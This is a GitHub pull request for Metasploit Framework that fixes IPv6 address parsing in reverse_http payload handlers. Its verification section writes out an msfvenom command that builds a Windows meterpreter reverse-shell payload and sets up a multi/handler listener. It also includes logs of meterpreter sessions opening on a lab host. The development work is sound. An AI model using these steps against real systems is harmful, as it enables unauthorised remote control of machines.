Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Fix parse IPv6 address in reverse_http #11892

Merged
merged 1 commit into from May 31, 2019

Conversation

Projects
None yet
3 participants
@ssyy201506
Copy link
Contributor

commented May 29, 2019

This PR fixes an error that meterpreter session does not establish when setting IPv6 address in LHOST of reverse_http.

Verification

  • msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_http LHOST=<ipv6 address> LPORT=<lport> -f psh-cmd > payload.bat
  • Start msfconsole
  • use exploit/multi/handler
  • set PAYLOAD windows/meterpreter/reverse_http
  • set LHOST <ipv6 address>
  • set LPORT <lport>
  • (set ReverseListenerBindAddress <ipv6 address%scope id>) --- if LHOST is link local
  • set ExitOnSession false
  • run -j
  • execute payload
  • Verify that the output does not contain any error messages

Before fix

root@host64msf:~# dpkg -l | grep metasploit
ii  metasploit-framework                       5.0.25+20190526102506~1rapid7-1              amd64        The full stack of metasploit-framework
msf5 > version
Framework: 5.0.25-dev-
Console  : 5.0.25-dev-

msf5 > use multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf5 exploit(multi/handler) > set LHOST fe80::a00:27ff:fef2:e1b0
LHOST => fe80::a00:27ff:fef2:e1b0
msf5 exploit(multi/handler) > set ReverseListenerBindAddress fe80::a00:27ff:fef2:e1b0%eth1
ReverseListenerBindAddress => fe80::a00:27ff:fef2:e1b0%eth1
msf5 exploit(multi/handler) > set LPORT 8080
LPORT => 8080
msf5 exploit(multi/handler) > set ExitOnSession false
ExitOnSession => false
msf5 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

msf5 exploit(multi/handler) > 
[*] Started HTTP reverse handler on http://[fe80::a00:27ff:fef2:e1b0%eth1]:8080
msf5 exploit(multi/handler) > 
 
 ::
 ::
 (execute payload)
 ::

[-] http://[fe80::a00:27ff:fef2:e1b0%eth1]:8080 handling request from fe80::d45b:27a1:9b93:480%eth1; (UUID: mzm9frxj) Exception handling request: bad URI(is not URI?): http://[fe80:8080/Cq6fKkmIs7QwVzFWbLukRAxpDbdBIcOwf1yFofG6K6XQlGiuTq6XS6thezl6JomFTiKeBXXretnku/

After fix

 ::
 ::
 (execute payload)
 ::
[*] http://[fe80::a00:27ff:fef2:e1b0%eth1]:8080 handling request from fe80::d45b:27a1:9b93:480%eth1; (UUID: wwpuwthm) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 1 opened (fe80::a00:27ff:fef2:e1b0%eth1:8080 -> fe80::d45b:27a1:9b93:480%eth1:49159) at 2019-05-28 10:28:32 +0900

msf5 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN7-001
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : ja_JP
Domain          : LOCALDOMAIN
Logged On Users : 3
Meterpreter     : x86/windows
meterpreter > 

PAYLOAD=windows/meterpreter/reverse_http, LPORT=80:

 ::
 ::
 (execute payload)
 ::
[*] http://[fe80::a00:27ff:fef2:e1b0%eth1]:80 handling request from fe80::d45b:27a1:9b93:480%eth1; (UUID: sxbx1dtl) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 2 opened (fe80::a00:27ff:fef2:e1b0%eth1:80 -> fe80::d45b:27a1:9b93:480%eth1:49164) at 2019-05-28 10:34:12 +0900
 ::

PAYLOAD=windows/meterpreter/reverse_https, LPORT=8443:

 ::
 ::
 (execute payload)
 ::
[*] https://[fe80::a00:27ff:fef2:e1b0%eth1]:8443 handling request from fe80::d45b:27a1:9b93:480%eth1; (UUID: jqqxx1ys) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 3 opened (fe80::a00:27ff:fef2:e1b0%eth1:8443 -> fe80::d45b:27a1:9b93:480%eth1:49168) at 2019-05-28 10:35:45 +0900
 ::

PAYLOAD=windows/meterpreter/reverse_https, LPORT=443:

 ::
 ::
 (execute payload)
 ::
[*] https://[fe80::a00:27ff:fef2:e1b0%eth1]:443 handling request from fe80::d45b:27a1:9b93:480%eth1; (UUID: e4mnnw6f) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 4 opened (fe80::a00:27ff:fef2:e1b0%eth1:443 -> fe80::d45b:27a1:9b93:480%eth1:49172) at 2019-05-28 10:37:06 +0900
 ::

@busterb busterb self-assigned this May 31, 2019

@busterb

This comment has been minimized.

Copy link
Member

commented May 31, 2019

LGTM, thanks @ssyy201506

@busterb busterb merged commit ecda8d8 into rapid7:master May 31, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

busterb added a commit that referenced this pull request May 31, 2019

msjenkins-r7 added a commit that referenced this pull request May 31, 2019

@busterb

This comment has been minimized.

Copy link
Member

commented May 31, 2019

Release Notes

URI parsing now works properly with reverse_http/s payloads when you specify IPv6 addresses.

@ssyy201506

This comment has been minimized.

Copy link
Contributor Author

commented Jun 1, 2019

Thanks, @busterb

@ssyy201506 ssyy201506 deleted the ssyy201506:fix_ipv6_uri_parse branch Jun 1, 2019

@tdoan-r7 tdoan-r7 added the rn-fix label Jun 11, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.